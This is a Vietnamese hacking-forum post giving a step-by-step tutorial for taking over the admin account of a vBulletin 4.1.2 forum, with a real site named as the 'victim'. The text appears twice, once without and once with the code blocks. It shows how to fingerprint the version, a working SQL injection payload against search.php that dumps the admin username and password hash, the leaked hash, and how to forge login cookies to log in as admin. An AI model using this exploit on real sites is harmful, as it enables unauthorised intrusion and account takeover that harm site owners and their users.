S
StyleVN
New Member
ok mình bik đa số người bik về exploits này nhưng mình viết đại cho vui 
trước tiên chúng ta cần add-on trong firefox
và
ok chúng ta cần tìm 1 victim
Victim:http://www.tennisvn.net <= vbb 4.1.2
có nhiều người hỏi vậy sao check nó version nhiêu
1/thêm admincp như link http://www.tennisvn.net/admincp/ và mình nhìn vào có chữ vBulletin 4.1.2 Admin Control Panevậy là version 4.1.2 rùi
2/view page source và chúng ta nhìn vào
vậy là bik rùi
ok chúng ta bắt đầu cuộc hành trình
1/chúng ta cần register nick để vào dc group nó và thế ta vào group.php của nó như
và mình sẽ chọn group tennis Xì TEEN đễ bug :d
2/tiếp ta vào search.php của nó
mình tick cái groups của nó và keywords viết là (tên group) tennis Xì TEEN
lưu ý nên bật Live Http Header nhé
ok search nào
3/ sẽ ra group đó và chúng ta mỡ cái live http header ra và bạn kéo lên để kiếm cái
và kiếm từ Content-Length: 272
click bên dưới nó và chọn Replay
và tiếp thêm code vào
và click replay và trở lại web victim
chúng ta nhìn vào
Search:
Type: Groups; Keyword(s): tennis, TEEN; : Uncategorized, admin::9a5920bf6c717bb142ceb95566c82234
nay ta có username+password nó rùi nhé
9a5920bf6c717bb142ceb95566c82234<=MD5 nhưng đây ta chả cần giải nó bỏ vào
http://md5crack.com/
và bỏ pass đó vào generate MD5 HAsh
nó sẽ ra
4/ vậy là xong get user+pass của userid=1=admin rùi nhé
tiếp ta log off forum
bật cookie manager ở tools
mình click add
và ghi
Name:bb_userid
content:1
host:tennisvn.net
path:/
tiếp như trên nhé nhưng bên đây có tí thay đổi là
Name:bb_password
content
ass mới generate trên md5crack.com
ok click save giờ restart lại victim
và nó sẽ ra
còn gà ... ai thấy có vấn để gì góp ý cho mình
trước tiên chúng ta cần add-on trong firefox
PHP:
Live Http Headervà
PHP:
cookies manager+ 1.5.1ok chúng ta cần tìm 1 victim
Victim:http://www.tennisvn.net <= vbb 4.1.2
có nhiều người hỏi vậy sao check nó version nhiêu
1/thêm admincp như link http://www.tennisvn.net/admincp/ và mình nhìn vào có chữ vBulletin 4.1.2 Admin Control Panevậy là version 4.1.2 rùi
2/view page source và chúng ta nhìn vào
PHP:
<meta name="generator" content="vBulletin 4.1.2" />ok chúng ta bắt đầu cuộc hành trình
1/chúng ta cần register nick để vào dc group nó và thế ta vào group.php của nó như
và mình sẽ chọn group tennis Xì TEEN đễ bug :d
2/tiếp ta vào search.php của nó
mình tick cái groups của nó và keywords viết là (tên group) tennis Xì TEEN
lưu ý nên bật Live Http Header nhé
ok search nào
3/ sẽ ra group đó và chúng ta mỡ cái live http header ra và bạn kéo lên để kiếm cái
PHP:
http://www.tennisvn.net/search.php?do=processvà kiếm từ Content-Length: 272
click bên dưới nó và chọn Replay
và tiếp thêm code vào
PHP:
&cat[0]=1) UNION SELECT concat(username,0x3a,0x3a,password) FROM user WHERE userid=1#và click replay và trở lại web victim
chúng ta nhìn vào
Search:
Type: Groups; Keyword(s): tennis, TEEN; : Uncategorized, admin::9a5920bf6c717bb142ceb95566c82234
nay ta có username+password nó rùi nhé
PHP:
admin::9a5920bf6c717bb142ceb95566c822349a5920bf6c717bb142ceb95566c82234<=MD5 nhưng đây ta chả cần giải nó bỏ vào
http://md5crack.com/
và bỏ pass đó vào generate MD5 HAsh
nó sẽ ra
PHP:
de399e3474d6570b92d46eb00dc5c1844/ vậy là xong get user+pass của userid=1=admin rùi nhé
tiếp ta log off forum
bật cookie manager ở tools
mình click add
và ghi
Name:bb_userid
content:1
host:tennisvn.net
path:/
tiếp như trên nhé nhưng bên đây có tí thay đổi là
Name:bb_password
content
ass mới generate trên md5crack.com ok click save giờ restart lại victim
và nó sẽ ra
còn gà ... ai thấy có vấn để gì góp ý cho mình
